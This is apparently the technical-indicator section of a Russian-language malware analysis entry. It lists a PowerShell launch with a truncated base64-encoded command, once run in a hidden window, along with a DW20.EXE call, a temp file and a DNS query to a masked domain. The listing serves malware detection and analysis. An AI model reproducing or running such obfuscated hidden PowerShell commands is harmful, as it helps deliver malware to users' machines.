Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3ADEANQA0ADMAOQBfAD0AJwBZADAAMQBfADIAMQAnADsAJABCAF8AMwBfADIANwA3ADEAIAA9ACAAJwA5ADkANQAnADsAJAB3ADYANAA5ADYAMgA4ADgAPQAnAFoAMQA5ADkAMQA3ADgAOAAnADsAJABGAF8AMQAwAF8AMQA4AD0AJABlAG4AdgA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1948
- %TEMP%\1207946.cvr
- DNS ASK k6###32g76.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3ADEANQA0ADMAOQBfAD0AJwBZADAAMQBfADIAMQAnADsAJABCAF8AMwBfADIANwA3ADEAIAA9ACAAJwA5ADkANQAnADsAJAB3ADYANAA5ADYAMgA4ADgAPQAnAFoAMQA5ADkAMQA3ADgAOAAnADsAJABGAF8AMQAwAF8AMQA4AD0AJABlAG4AdgA...' (со скрытым окном)